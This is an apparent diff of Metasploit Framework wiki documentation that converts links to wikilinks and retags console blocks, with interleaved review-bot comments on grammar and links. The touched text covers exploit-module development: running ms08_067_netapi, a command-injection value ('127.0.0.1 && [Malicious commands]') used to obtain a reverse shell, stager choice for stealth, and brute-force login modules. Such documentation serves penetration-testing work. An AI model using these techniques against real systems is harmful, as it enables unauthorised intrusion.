However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners). If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).
However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]]. If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).
## Initializing Rex::Proto::Http::Client
@@ -1,5 +1,5 @@
# How to use Msf::Auxiliary::AuthBrute to write a bruteforcer
The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners) instead. However, some of the datastore options are still needed, so let's go over them right quick.
The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]] instead. However, some of the datastore options are still needed, so let's go over them right quick.
### Regular options
@@ -53,6 +53,6 @@ Check out the other advanced options in the API documentation below.
### References
- <https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Powershell.html>
- <https://docs.metasploit.com/api/Msf/Exploit/Powershell.html>
- <https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/powershell.rb>
- <https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/powershell/powerdump.ps1>
@@ -6,7 +6,7 @@ In this documentation, understand that we require you no exploit development kno
Each Metasploit module comes with some metadata that explains what it's about, and to see that you must load it first. An example:
```
```msf
msf > use exploit/windows/smb/ms08_067_netapi
```
@@ -24,7 +24,7 @@ This may sound surprising, but sometimes we get asked questions that are already
You can use the info command to see the module's description:
```
```msf
msf exploit(ms08_067_netapi) > info
```
@@ -36,13 +36,13 @@ If the exploit supports automatic targeting, it is always the first item on the
The "show options" command will tell you which target is selected. For example:
```
```msf
msf exploit(ms08_067_netapi) > show options
```
The "show targets" command will give you a list of targets supported:
```
```msf
msf exploit(ms08_067_netapi) > show targets
```
@@ -50,13 +50,13 @@ msf exploit(ms08_067_netapi) > show targets
All Metasploit modules come with most datastore options pre-configured. However, they may not be suitable for the particular setup you're testing. To do a quick double-check, usually the "show options" command is enough:
```
```msf
msf exploit(ms08_067_netapi) > show options
```
However, "show options" only shows you all the basic options. It does not show you the evasive or advanced options (try "show evasion" and "show advanced"), the command you should use that shows you all the datastore options is actually the "set" command:
```
```msf
msf exploit(ms08_067_netapi) > set
```
@@ -158,7 +158,7 @@ Now let's modify the `execute_command` method and get code execution against the
127.0.0.1+%26%26+[Malicious commands]
```
We do that in `execute_command` using [HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:
We do that in `execute_command` using [[HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]]. Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:
```ruby
def filter_bad_chars(cmd)
@@ -187,10 +187,10 @@ end
And let's run that, we should have a shell:
```
```msf
msf exploit(cmdstager_demo) > run
[*] Started reverse TCP handler on 10.6.0.92:4444
[*] Started reverse TCP handler on 10.6.0.92:4444
[*] Exploiting...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 10.6.0.92
@@ -223,7 +223,7 @@ Available flavors:
The [VBS command stager](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/vbs.rb) is for Windows. What this does is it encodes our payload with Base64, save it on the target machine, also writes a [VBS script](https://github.com/rapid7/rex-exploitation/blob/master/data/exploits/cmdstager/vbs_b64) using the echo command, and then lets the VBS script to decode the Base64 payload, and execute it.
If you are exploiting Windows that supports Powershell, then you might want to [consider using that instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit) of the VBS stager, because Powershell tends to be more stealthy.
If you are exploiting Windows that supports Powershell, then you might want to [[consider using that instead|./How-to-use-Powershell-in-an-exploit.md]] of the VBS stager, because Powershell tends to be more stealthy.
To use the VBS stager, either specify your CmdStagerFlavor in the metadata:
@@ -21,7 +21,7 @@ option, which can be set by using the `setg` command. Module-level means only th
remembers that datastore option, no other components will know about it. You are setting a module-level option if you
load a module first, and then use the `set` command, like the following:
```
```msf
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 10.0.1.3
rhost => 10.0.1.3
@@ -27,13 +27,14 @@ OPTIONS:
-c Clear the contents of the favorite modules file
-d Delete module(s) or the current active module from the favorite modules file
-h Help banner
-l Print the list of favorite modules (alias for `show favorites`)
```
The second method of adding favorites allows adding multiple modules at once:
```shell
```msf
msf6 > favorite exploit/multi/handler exploit/windows/smb/psexec
[+] Added exploit/multi/handler to the favorite modules file
[+] Added exploit/windows/smb/psexec to the favorite modules file
@@ -72,7 +73,7 @@ msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec
#### Clearing the favorites list
```shell
```msf
msf6 > show favorites
Favorites
@@ -89,3 +90,18 @@ msf6 > show favorites
[!] The favorite modules file is empty
```
### Printing the list of favorite modules
The list of favorite modules can be printed by supplying the `-l` flag. This is an alias for the `show favorites` and `favorites` commands.
```shell
msf6 > favorite -l
Favorites
=========
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/handler manual No Generic Payload Handler
1 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
```
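Review bot: the newly added `Printing the list of favorite modules` block is fenced ```shell, while the two hunks just above retag the same kind of msfconsole output from ```shell to ```msf; tag the new block ```msf as well so the file is consistent.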
@@ -351,7 +351,7 @@ end
The module will start the http server and print the repo to clone
```
```msf
msf6 > use exploit/multi/http/git_clone_test
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/git_clone_test) > set srvport 9999
@@ -23,7 +23,7 @@ When the mixin is included, notice there will be the following datastore options
* **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
* **TCP::send_delay** - Evasive option. Delays inserted before every send.
If you wish to learn how to change the default value of a datastore option, please read "[Changing the default value for a datastore option](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options#changing-the-default-value-for-a-datastore-option)"
If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"
## Make a connection
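Review bot: the `Changing the default value for a datastore option` link drops the `#changing-the-default-value-for-a-datastore-option` fragment; the link text names that exact section, so append the fragment to `./How-to-use-datastore-options.md` if the wiki-link syntax allows it, otherwise readers land at the top of a long page.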
@@ -1,6 +1,6 @@
This is a step-by-step guide on how to write a HTTP login module using the latest LoginScanner and Credential APIs.
Before we begin, it's probably a good idea to read [Creating Metasploit Framework LoginScanners](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners), which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.
Before we begin, it's probably a good idea to read [[Creating Metasploit Framework LoginScanners|./Creating-Metasploit-Framework-LoginScanners.md]], which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.
## Step 1: Set up your target environment
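Review bot: the rewritten sentence keeps "the Credential API can found as a metasploit-credential gem here"; since the line is being touched anyway, change it to "can be found as". The link text `lib/metasploit/framework/loginscanner` also disagrees with the linked path `login_scanner`; align the text with the actual directory name.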
@@ -382,7 +382,7 @@ And finally, make sure your module actually works.
Test for a successful login:
```
```msf
msf auxiliary(symantec_web_gateway_login) > run
[+] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Success: 'sinn3r:GoodPassword'
@@ -393,7 +393,7 @@ msf auxiliary(symantec_web_gateway_login) >
Test for a failed login:
```
```msf
msf auxiliary(symantec_web_gateway_login) > run
[-] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Failed: 'sinn3r:BadPass'
@@ -1,8 +1,8 @@
The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are:
* **[Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer)** - The most basic form of a HTTP server.
* **[[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]]** - The most basic form of a HTTP server.
* **[Msf::Exploit::Remote::HttpServer::HTML](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http_server/html.rb)** - which provides Javascript functions that the module can use when crafting HTML contents.
* **[Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.
* **[[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.
### The Automatic Exploitation Procedure
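Review bot: the `HttpServer::HTML` bullet in this list spells it "Javascript" while the obfuscation section of the same document uses "JavaScript"; pick the latter for consistency. "a HTTP server" in the first bullet should read "an HTTP server".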
@@ -139,7 +139,7 @@ def on_request_exploit(cli, request, target_info)
</html>
|
send_exploit_html(cli, html)
end
end
```
[ERB](http://ruby-doc.org/stdlib-2.1.3/libdoc/erb/rdoc/ERB.html) is a new way to write Metasploit browser exploits. If you've written one or two web applications, this is no stranger to you. When you're using the BrowserExploitServer mixin to write an exploit, what really happens is you're writing a rails template. Here's an example of using of this feature:
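Review bot: the paragraph after the code block says that with BrowserExploitServer "you're writing a rails template"; ERB is part of Ruby's standard library and is not Rails-specific, so "an ERB template" is the accurate wording. The ERB link is also pinned to `stdlib-2.1.3`, which is long out of date; point it at current ERB documentation so it does not go stale with the Ruby version.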
@@ -296,7 +296,7 @@ If your BES-based exploit does not want obfuscation at all, always make sure you
deregister_options('JsObfuscate')
```
To learn more about Metasploit's JavaScript obfuscation capabilities, please read [How to obfuscate JavaScript in Metasploit](https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit).
To learn more about Metasploit's JavaScript obfuscation capabilities, please read [[How to obfuscate JavaScript in Metasploit|./How-to-obfuscate-JavaScript-in-Metasploit.md]].
### Related Articles:
@@ -1,4 +1,4 @@
The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer), Msf::Exploit::Remote::HttpServer::HTML and [Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer). This writeup covers the HttpServer mixin.
The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]], Msf::Exploit::Remote::HttpServer::HTML and [[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]. This writeup covers the HttpServer mixin.
The HttpServer mixin is kind of the mother of all HTTP server mixins (like BrowserExploitServer and HttpServer::HTML). To use it, your module is required to have a "on_request_uri" method, which is a callback triggered when the HTTP server receives a HTTP request from the browser. An example of setting up "on_request_uri":
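Review bot: `on_request_uri` is wrapped in straight double quotes twice in the second paragraph ("on_request_uri" method, setting up "on_request_uri"); method names elsewhere in these docs are set in backticks, so use `on_request_uri` here as well. "a `on_request_uri` method" should then read "an `on_request_uri` method".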
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
@@ -82,7 +82,7 @@ In case you're wondering why the web server must terminate after a period of tim
The output for the above example should look something like this:
```
```msf
msf exploit(test) > run
[*] Exploit running as background job.
@@ -30,7 +30,7 @@ The exploit should say what requirements are not met. The requirements are expla
If you'd like to check the comparisons, simply set VERBOSE to true. The following is an example:
```
```msf
msf exploit(ms13_022_silverlight_script_object) > set VERBOSE true
VERBOSE => true
msf exploit(ms13_022_silverlight_script_object) > run
@@ -1,13 +1,13 @@
**This page is meant for Committers. If you are unsure whether you are a committer, you are not.**
Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [Dev environment setup](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.
Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [[Dev environment setup|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.
# The short story
- Configure your git environment as described [here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#keeping-in-sync).
- Configure your git environment as described [[here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]].
- Add the `fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*` line to your `.git/config`.
- Add your signing key `git config --global user.signingkey`
- Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below:
- Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below:
```
pub rsa4096 2020-04-07 [SC]
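Review bot: the replacement `[[here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]]` loses the `#keeping-in-sync` fragment of the original URL, so "as described here" no longer points at the relevant section; keep the fragment or name the section in the bullet. In the same hunk the bullet "Add your signing key `git config --global user.signingkey`" has neither a key value nor a verb; since the full command with a key id is shown a few lines below, either fold this bullet into that one or reword it as "Add your signing key with `git config --global user.signingkey <keyid>`".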
@@ -16,7 +16,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
sub rsa4096 2020-04-07 [E]
```
- Set the GPG key as your signing key. To set the key shown above as the signing key for all repositories, one would execute:
```
git config --global user.signingkey 3198961E148FF5E527E31A5FD35E05C0F2B81E83
```
@@ -30,13 +30,13 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
Fixes #1024, also see #999.
````
- The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a
- The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a
nice assurance that you're really you.
- The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if
- The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if
the merge would normally be resolved as a fast forwards. This ensure that all changes have a
commit associated with them.
- The `--edit` flag will drop you into your default editor (normally vim), and will allow you
to edit the commit message so that it conforms to Metasploit standards, rather than sticking
- The `--edit` flag will drop you into your default editor (normally vim), and will allow you
to edit the commit message so that it conforms to Metasploit standards, rather than sticking
with git's pre-generated commit message which does not.
- Note that the `--no-ff` flag should be used both for PRs that go back to a contributor's branch as well as PRs that land in Metasploit's master branch.
- If you're making changes (often the case), merge to a landing branch, then merge **that** branch to upstream/master with the `-S --no-ff --edit` options.
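Review bot: the `--no-ff` bullet is touched by this hunk but keeps two wording errors: "resolved as a fast forwards" should be "resolved as a fast-forward", and "This ensure that all changes have a commit" should be "This ensures". The hunk otherwise changes these lines only in whitespace, so fixing the text here costs nothing.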
@@ -46,7 +46,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
Check out [this gist](https://gist.github.com/todb-r7/3fbee1a9e7b36d82ca55) that automates (mostly) landing pull requests, signing the merge commit, all while rarely losing a race with other committers.
# Fork and clone
First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [as described here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#wiki-ssh), but the https method will work, too.
First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [[as described here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]], but the https method will work, too.
Once this is done, you will have a remote repository called "origin," which points to your forked repository on GitHub. You will be doing most of your work in your own fork of Metasploit, even if you have commit rights to Rapid7's fork. Now, we're going to add an "upstream" repository to talk to the Rapid7 repository.
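Review bot: the new wikilink `[[as described here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]]` drops the `#wiki-ssh` fragment from the original URL, so the ssh alias instructions the sentence refers to are no longer linked directly; keep the anchor or say "in the SSH section of the dev environment guide".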
@@ -135,7 +135,7 @@ In this particular case with PR #1217, I did want to send some changes back to t
Here's an example with #6954 (your workflow may vary):
```
$ git checkout upstream/master
$ git checkout upstream/master
Note: checking out 'upstream/master'.
You are in 'detached HEAD' state. You can look around, make experimental
@@ -258,7 +258,7 @@ c = commit -S --edit
m = merge -S --no-ff --edit
````
People with commit rights to rapid7/metasploit-framework will have their [keys listed here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].
# Post-Merge
@@ -291,4 +291,4 @@ If that works, great, you know you don't have any merge conflicts right now.
# Questions and Corrections
Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
@@ -1,6 +1,6 @@
By default test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:
```
```msf
msf6 > loadpath test/modules
Loaded 38 modules:
14 auxiliary modules
@@ -9,4 +9,4 @@ Loaded 38 modules:
msf6 >
```
These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
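Review bot: the paragraph being touched still ends with "assuming it is has been signed off and approved by the team"; drop the stray "is" so it reads "assuming it has been signed off". "no other way to go around this" would also read better as "no other way to work around this".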
@@ -1,6 +1,6 @@
Metasploit Framework 5.0 has released!
Metasploit Framework 5.0 has released!
Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.
Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.
See the release announcement [here](https://blog.rapid7.com/2019/01/10/metasploit-framework-5-0-released).
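Review bot: the opening line "Metasploit Framework 5.0 has released!" is being rewritten (apparently whitespace-only) and should read "Metasploit Framework 5.0 has been released!" since the release is the object, not the subject, of the verb.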
@@ -12,7 +12,7 @@ The following is a high-level overview of Metasploit 5.0's features and capabili
* A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.
* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [[here|./Metasploit-Web-Service.md]].
* Adds `evasion` module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules [here](https://www.rapid7.com/info/encapsulating-antivirus-av-evasion-techniques-in-metasploit-framework). Rapid7's first evasion modules are [here](https://github.com/rapid7/metasploit-framework/pull/10759).
@@ -28,6 +28,6 @@ The following is a high-level overview of Metasploit 5.0's features and capabili
You can get Metasploit 5.0 by checking out the [5.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/5.0.0) in the Metasploit GitHub project.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://docs.metasploit.com/), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
See all the ways to stay informed and get involved at <https://metasploit.com>.
@@ -22,7 +22,7 @@ Metasploit 6 adds support for SMB client connections using the version 3 dialect
While many modules were updated to use the RubySMB SMB 3 implementation, not all were updated. Notably many older exploits that pre-date the release of SMB 3 were not updated and continue to use the original Rex implementation of the protocol. For those modules that have been updated however, users will be able to use them without any changes to their work flow. By default the newest dialect will be negotiated with the remote server and if it is one of the dialects within version 3 that supports encryption, the framework will use encryption by default. Users can alter this behavior by setting the `SMB::AlwaysEncrypt` and `SMB::ProtocolVersion` options. `SMB::AlwaysEncrypt` enforces encryption for SMB 3 connections even when the server does not require it (defaults to: `true`) while `SMB::ProtocolVersion` is a comma separated list of versions to allow the framework to negotiate (default: `1,2,3`).
Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [Guidelines for Writing Modules with SMB](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Writing-Modules-with-SMB).
Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [[Guidelines for Writing Modules with SMB|./Guidelines-for-Writing-Modules-with-SMB.md]].
## Pull Requests
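Review bot: the rewritten SMB paragraph keeps "For information on writing modules target SMB for Metasploit"; change it to "writing modules that target SMB". The same sentence runs two clauses together without punctuation ("standardized within the mixins however some edge-case functionality"); a comma or semicolon before "however" is needed.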
@@ -48,6 +48,6 @@ A complete list of pull requests included as part of the initial version 6 work:
You can get Metasploit 6.0 by checking out the [6.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/6.0.0) in the Metasploit GitHub project.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://docs.metasploit.com/), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
See all the ways to stay informed and get involved at <https://metasploit.com>.
@@ -30,7 +30,7 @@ Our solution to this is a data service proxy. A data service proxy allows us to
Currently we plan to support the legacy data storage technology stack (RAILS/PostgreSQL) which we hope to eventually phase out. The new implementation will use a RESTful (https://en.wikipedia.org/wiki/Representational_state_transfer) approach whereby calls to `framework.db` can be proxied to a remote web service that supports the same data service API. We have built a web service that runs atop the current data storage service for the community.
This approach enables us to:
* More easily enhance the metasploit data model
* More easily enhance the Metasploit data model
* Run a web-based data service independent of the Metasploit Framework
* Reduces the memory used by a Metasploit Framework instance using a data service by no longer requiring a DB client
* Increases throughput as storage calls don't necessarily need to be asynchronous
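Review bot: the bullet list this hunk edits mixes verb forms: "More easily enhance" and "Run" are imperatives, while "Reduces the memory" and "Increases throughput" are third person. Since the list is already being touched for the "Metasploit" capitalisation fix, change the last two to "Reduce" and "Increase" so all items read as things the approach enables us to do.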
@@ -41,4 +41,4 @@ This approach enables us to:
## Usage
For more information on setting up the web service and using the data services see [Metasploit Web Service](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
For more information on setting up the web service and using the data services see [[Metasploit Web Service|./Metasploit-Web-Service.md]].
@@ -1,22 +1,22 @@
## What is msfdb?
msfdb is a script included with all installations of Metasploit that allows you to easily setup and control both a database and a Web Service capable of connecting this database with Metasploit.
While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database).
While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database).
## Why should I use msfdb?
It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database.
It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database.
The Metasploit features that require a connected database include:
* Recording other machines on a network that are found with a nmap scan via the `db_nmap` command are stored as "Hosts".
* Hosts can be viewed with the `hosts` command
* Storing credentials successfully extracted by exploits are stored as "creds".
* Storing credentials successfully extracted by exploits are stored as "creds".
* Credentials are viewed with the `creds` command.
* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities".
* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities".
* Successful exploitations can be viewed with the `vulns` command.
* The `vulns` command also tracks unsuccessful exploitation attempts
* The `vulns` command also tracks unsuccessful exploitation attempts
* Storing services detected on remote hosts by `db_nmap` are recorded as "Services"
* Remote services are viewed with the `services` command
* Tracking multiple remote sessions opened by exploit payloads
* Tracking multiple remote sessions opened by exploit payloads
* These sessions can be managed and tracked with the `sessions` command.
* Storing any difficult to define information returned by successful exploits as "Loot"
* Viewable with the `loot` command
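Review bot: the sentence being rewritten under "Why should I use msfdb?" contains an agreement error, "a lot of the features that makes Metasploit so great require a database", which should be "that make". "setup" is used as a verb in both this sentence and the intro ("easily setup and control", "the simplest way to setup"); the verb is "set up", the noun is "setup". The feature bullets also mix gerund subjects with passive verbs ("Recording other machines ... are stored as Hosts", "Keeping track of successful exploitation attempts are recorded as"); "Machines found with ... are stored as Hosts" and "Successful exploitation attempts are recorded as Vulnerabilities" would be cleaner.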
@@ -62,7 +62,7 @@ Generating SSL key and certificate for MSF web service
Attempting to start MSF web service...success
MSF web service started and online
Creating MSF web service user your_current_account_name
############################################################
## MSF Web Service Credentials ##
## ##
@@ -77,15 +77,15 @@ MSF web service user API token: super_secret_api_token
MSF web service configuration complete
The web service has been configured as your default data service in msfconsole with the name "local-https-data-service"
If needed, manually reconnect to the data service in msfconsole using the command:
db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443
The username and password are credentials for the API account:
https://localhost:5443/api/v1/auth/account
```
Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed:
Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed:
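Review bot: the rewritten sentence has a plural subject with a singular verb: "The Username, Password, and API token used to connect to the Web Service is displayed" should be "are displayed".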
```
MSF web service username: your_current_account_name
@@ -93,7 +93,7 @@ MSF web service password: super_secret_password
MSF web service user API token: super_secret_api_token
```
Followed by instructions on how to connect to your database with Metasploit via the Web Service:
Followed by instructions on how to connect to your database with Metasploit via the Web Service:
```
If needed, manually reconnect to the data service in msfconsole using the command:
@@ -109,23 +109,23 @@ https://localhost:5443/api/v1/auth/account
All this information is loaded by Metasploit automatically at startup from the ~/.msf4 folder. You should copy the credentials to a file in case you need them in the future. If you forget or lose the credentials but you can always run `./msfdb reinit` and reset the Web Service authentication details. **Just make sure to say no to the prompt asking you if you want to delete the Database contents!**
## msfdb commands
## msfdb commands
The commands for msfdb are as follows:
* `./msfdb init` Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice.
* `./msfdb delete` Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.
